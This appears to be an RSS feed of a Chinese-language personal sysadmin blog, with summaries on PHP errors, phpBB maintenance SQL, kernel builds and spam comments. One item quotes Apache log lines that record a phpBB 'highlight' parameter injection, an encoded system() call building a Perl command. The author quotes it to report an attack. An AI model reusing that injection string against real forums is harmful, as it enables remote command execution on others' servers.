<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title>Kreny&apos;s Blog</title>
<link>http://weblog.kreny.com/</link>
<description>多锻炼身体，多健康身心; 培养一个爱好，坚持一个信念~~</description>
<language>en-us</language>
<copyright>Copyright 2007</copyright>
<lastBuildDate>Tue, 12 Dec 2006 18:57:40 +0900</lastBuildDate>
<pubDate>Sun, 15 Apr 2007 13:37:35 +0900</pubDate>
<generator>http://www.movabletype.org/?v=3.15</generator>
<docs>http://blogs.law.harvard.edu/tech/rss</docs> 

<item>
<title>gd-jpeg: JPEG library reports unrecoverable error</title>
<description>这几天主机上传照片居然出现了以下的问题： gd-jpeg: [12-Dec-2006 18:05:33] PHP Warning: imagejpeg() [function.imagejpeg]: gd-jpeg: JPEG library reports unrecoverable error: in /home/hzmjp/public_html/includes/functions.php on line 383百思不得其解。 的确最近升级了php 到　4.4.4(个人很不喜欢这个版本，不仅仅数字不好看，而且问题超多), 但是用的是以前的 config.nice 所以不太会有啥大问题。在 google 上找了这个问题，多半没有回答。 最终在 df 中找到了答案－－磁盘满了，所以写不进去了，文件是建立了，但是 size 是 0。　如果有同样经历的朋友，先看看您的磁盘满了没～ 汗! (－－)；...</description>
<link>http://weblog.kreny.com/archives/2006/12/gdjpeg_jpeg_lib.html</link>
<guid>http://weblog.kreny.com/archives/2006/12/gdjpeg_jpeg_lib.html</guid>
<category>Server Log</category>
<pubDate>Tue, 12 Dec 2006 18:57:40 +0900</pubDate>
</item>
<item>
<title>PHPBB的一些维护SQL</title>
<description>这里只作一个备份，不建议大家使用。 首先删除不存在的GroupDELETE FROM `phpbb_groups` WHERE group_id NOT IN ( SELECT group_id FROM `phpbb_user_group` ) 接着删除不存在用户的GroupSELECT * FROM `phpbb_user_group` WHERE user_id NOT IN ( SELECT user_id FROM `phpbb_users` ) AND user_id &gt;0 找出注册却未登陆过的用户SELECT user_id FROM `phpbb_users` where `user_lastvisit`= &apos;0&apos; and `user_id` &gt; 0 ORDER BY `user_regdate` ASC; SELECT * / DELETE FROM `phpbb_user_group` WHERE user_id IN ( SELECT user_id FROM `phpbb_users` WHERE `user_lastvisit` = &apos;0&apos; AND `user_id` &gt;0 ) SELECT * / DELETE FROM `phpbb_users` WHERE `user_lastvisit` = &apos;0&apos; AND `user_id`...</description>
<link>http://weblog.kreny.com/archives/2006/11/phpbbcaeaecsql.html</link>
<guid>http://weblog.kreny.com/archives/2006/11/phpbbcaeaecsql.html</guid>
<category>Server Log</category>
<pubDate>Tue, 07 Nov 2006 23:46:44 +0900</pubDate>
</item>
<item>
<title>OpenPNE之GD安装记录</title>
<description>老板要俺安装个 OpenPNE , 无奈之下试验了一下。 安装完毕后发现不能上传图片， Google 了一下，找到了一个解决方案，顺便在这里记录一下。 服务器原本的PHP配置：&apos;./configure&apos; &apos;--with-mysql=/usr/local/mysql&apos; &apos;--with-apxs2=/usr/local/apache2/bin/apxs&apos; &apos;--with-openssl=/usr/local/ssl&apos; &apos;--enable-mbstring=all&apos; &apos;--enable-mbregex&apos; &apos;--with-zlib&apos; &apos;--with-dom&apos; &apos;--with-oci8-instant-client=/usr/local/kdx/instantclient10_1&apos; &apos;--enable-sigchild&apos; 发现没有安装 GD library,于是补上。当然特别要注意的是 jpeg 的支持。...</description>
<link>http://weblog.kreny.com/archives/2006/06/openpneee.html</link>
<guid>http://weblog.kreny.com/archives/2006/06/openpneee.html</guid>
<category>Server Log</category>
<pubDate>Mon, 12 Jun 2006 16:32:01 +0900</pubDate>
</item>
<item>
<title>GTK + GNOME + Xft + GIMP 的安装配置</title>
<description>Xft - X FreeType interface library
</description>
<link>http://weblog.kreny.com/archives/2005/10/gtk_errors_xft.html</link>
<guid>http://weblog.kreny.com/archives/2005/10/gtk_errors_xft.html</guid>
<category>Server Log</category>
<pubDate>Thu, 13 Oct 2005 17:05:56 +0900</pubDate>
</item>
<item>
<title>MTR:结合 ping + traceroute 的小工具</title>
<description>名称： MTR 主页：http://www.bitwizard.nl/mtr/ 说明：mtr combines the functionality of the &apos;traceroute&apos; and &apos;ping&apos; programs in a single network diagnostic tool. 下载地址： ftp://ftp.bitwizard.nl/mtr/ 安装方法： # tar -zxvf mtr-0.69.tar.gz # cd mtr-0.69 # ./configure # make # make check # make install...</description>
<link>http://weblog.kreny.com/archives/2005/04/mtrc_ping_trace.html</link>
<guid>http://weblog.kreny.com/archives/2005/04/mtrc_ping_trace.html</guid>
<category>Server Log</category>
<pubDate>Mon, 25 Apr 2005 19:15:27 +0900</pubDate>
</item>
<item>
<title>受到了 howdark.com exploits</title>
<description>今天在我的 phpbb 论坛中受到了很多奇怪的访问，访问量大增的同时，apache 的log文件中有以下这些特殊的log文字：213.196.37.235 - - [19/Feb/2005:02:26:54 +0800] &quot;GET /viewtopic.php?p=2936&amp;highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) %252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252 Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr HTTP/1.0&quot; 200 24984 &quot;-&quot; &quot;Mozilla/4.0&quot; 137.111.13.34 - - [19/Feb/2005:02:29:29 +0800] &quot;GET /viewtopic.php?p=1672&amp;highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114) %252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252 Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252 HTTP/1.1&quot; 200 32237 &quot;-&quot; &quot;Opera/7.50&quot;很显然是一种扫描或者爬虫。查询了很多关于 apache 和 phpbb 的资料，现在把这些东东都整理了一下。...</description>
<link>http://weblog.kreny.com/archives/2005/02/ae_howdarkcom_e.html</link>
<guid>http://weblog.kreny.com/archives/2005/02/ae_howdarkcom_e.html</guid>
<category>Server Log</category>
<pubDate>Sat, 19 Feb 2005 04:05:35 +0900</pubDate>
</item>
<item>
<title>使用flickr的&quot;BlogThis&quot;功能连接你的blog</title>
<description> 这里会自动填写标题:小船 Originally uploaded by kreny. flickr 不仅仅是一个share图片的好去处，同时，使用 flickr 的 &quot;BlogThis&quot; 按钮可以把你在 flickr 上看到的你喜欢的图片方便地 blog 到你的 weblog 上，即使这并不是你的图片。 本贴就是通过 Blog This photo 发布的。 你有很多 layout 的选择，同时也可以 customize flickr 图片在你的 weblog 上的显示参数。 详见： Do you have a Blog? Include your photos on your website...</description>
<link>http://weblog.kreny.com/archives/2005/01/aecflickrcblogt_1.html</link>
<guid>http://weblog.kreny.com/archives/2005/01/aecflickrcblogt_1.html</guid>
<category>Server Log</category>
<pubDate>Sat, 29 Jan 2005 18:16:47 +0900</pubDate>
</item>
<item>
<title>MediaWiki 1.4beta5 安装手记</title>
<description><![CDATA[安装了 <a href="http://en.wikipedia.org/wiki/Main_Page">Wikipedia</a> 使用的 <a href="http://wikipedia.sourceforge.net/">mediawiki</a>，建立了<a href="http://mediawiki.kreny.com/">自己的 mediawiki</a>。这里记录一下安装和配置过程。]]></description>
<link>http://weblog.kreny.com/archives/2005/01/mediawiki_14bet.html</link>
<guid>http://weblog.kreny.com/archives/2005/01/mediawiki_14bet.html</guid>
<category>Server Log</category>
<pubDate>Sat, 22 Jan 2005 22:40:42 +0900</pubDate>
</item>
<item>
<title>Spam Comments 造成 MT 表格的损坏</title>
<description><![CDATA[这几天收到了很多 MT 的 Spammer 的 Spam Comments. 以前是简单地把这些 URL 加入了 Blacklist, 但是今天在删除回响的时候出现了以下错误信息：<blockquote><font color="red">"Can't use an undefined value as a SCALAR reference at lib\MT\App\CMS.pm line 2176"</font></blockquote> 虽然可以把这些垃圾留言都删除，但是始终无法浏览所有的回响…]]></description>
<link>http://weblog.kreny.com/archives/2005/01/spam_comments_e.html</link>
<guid>http://weblog.kreny.com/archives/2005/01/spam_comments_e.html</guid>
<category>Server Log</category>
<pubDate>Wed, 19 Jan 2005 20:41:37 +0900</pubDate>
</item>
<item>
<title>关于加快 lilina 显示速度的一些设置</title>
<description><![CDATA[我的 lilina 在设定了几位朋友的 blog 和一些 news 以后，发现打开速度异常的慢，于是请教了车东，解决了问题。
解决的关键在于：<blockquote>直接将以下语句加入到 index.php 头部即可，LILINA中你可以对MAGPIE的一些全局变量进行预设。
<font color="red">define('MAGPIE_FETCH_TIME_OUT', 60 * 60 * 3);</font></blockquote>这方面我还是个外行，以下是具体请教的主要内容，暂且转用一下作为备份吧(已经得到作者同意刊登)：]]></description>
<link>http://weblog.kreny.com/archives/2005/01/ae_lilina_cecae.html</link>
<guid>http://weblog.kreny.com/archives/2005/01/ae_lilina_cecae.html</guid>
<category>Server Log</category>
<pubDate>Fri, 14 Jan 2005 18:43:18 +0900</pubDate>
</item>
<item>
<title>升级 kernel 到 2.6.10</title>
<description>为了安装 VPN ，我把 kernel 加入了 ppp 模块并升级到了 2.6.10。 今天的升级比较顺利。 嘿嘿～ 参考文档： Kernel Rebuild Guide 找到了原作者的老家，所以比较容易读懂。 ;-) 不过 Kwan 的主页上还有 mathmatics 噢～ 需要的朋友可以去看看。 [原]在redhat as 3.0 上精简并编译系统内核(适用于初级用户) 这篇最后对于重启的部分没有很好的说明，只看看那些硬件或者配置需要或不需要就可以了。 我主要的配置过程中使用 make menuconfig 从现有的 rpm 升级的内核 2.6.9 中提取了原配置(/boot/config-2.6.9-1.667smp),然后在此基础上，去掉了不需要的模块：IEEE 1394 (FireWire) support Token Ring devices Parallel port support PCMCIA network device support IrDA (infrared) subsystem support ISDN support Graphic - vodoo3 etc. 并 build in 了 ppp。 以下是配置记录，红色处是重点或者需注意处。这里可以下载编译前的 2.6.9smp 的配置文件和 2.6.10 的 .config 文件。...</description>
<link>http://weblog.kreny.com/archives/2005/01/c_kernel_2610.html</link>
<guid>http://weblog.kreny.com/archives/2005/01/c_kernel_2610.html</guid>
<category>Server Log</category>
<pubDate>Wed, 05 Jan 2005 04:14:27 +0900</pubDate>
</item>
<item>
<title>Troubleshooting for &quot;Warning: Illegal offset type in ...&quot; in PHP</title>
<description>roubleshooting for &quot;Warning: Illegal offset type in ...&quot; in PHP 4.3.10.</description>
<link>http://weblog.kreny.com/archives/2004/12/troubleshooting.html</link>
<guid>http://weblog.kreny.com/archives/2004/12/troubleshooting.html</guid>
<category>Server Log</category>
<pubDate>Fri, 17 Dec 2004 02:08:13 +0900</pubDate>
</item>
<item>
<title>试装 MT-Blacklist 2.02a 来抵挡垃圾留言</title>
<description><![CDATA[试装 <a href="http://www.jayallen.org/comment_spam/forums/index.php?showtopic=321">MT-Blacklist 2.02a</a> 抵挡 <a href="http://www.jayallen.org/comment_spam/">spam comment & spam trackback</a>]]></description>
<link>http://weblog.kreny.com/archives/2004/12/ee_mtblacklist.html</link>
<guid>http://weblog.kreny.com/archives/2004/12/ee_mtblacklist.html</guid>
<category>Server Log</category>
<pubDate>Thu, 16 Dec 2004 23:38:24 +0900</pubDate>
</item>
<item>
<title>安装 Mutt 邮件客户端失败经历(问题已经解决)</title>
<description><![CDATA[为了实现 Linux 命令行下带附件的 e-mail 的发送而安装了 <a href="http://www.mutt.org/">Mutt E-Mail Client</a>。]]></description>
<link>http://weblog.kreny.com/archives/2004/12/installing_the.html</link>
<guid>http://weblog.kreny.com/archives/2004/12/installing_the.html</guid>
<category>Server Log</category>
<pubDate>Wed, 15 Dec 2004 21:40:26 +0900</pubDate>
</item>
<item>
<title>试试 Gallery －－ 一个不错的网络相册</title>
<description><![CDATA[试装 <a href="http://gallery.menalto.com/">Gallery</a> 并对安装 Gallery 后产生的 php 安全问题进行讨论。]]></description>
<link>http://weblog.kreny.com/archives/2004/12/ee_gallery_ieie.html</link>
<guid>http://weblog.kreny.com/archives/2004/12/ee_gallery_ieie.html</guid>
<category>Server Log</category>
<pubDate>Mon, 13 Dec 2004 14:45:51 +0900</pubDate>
</item>


</channel>
</rss>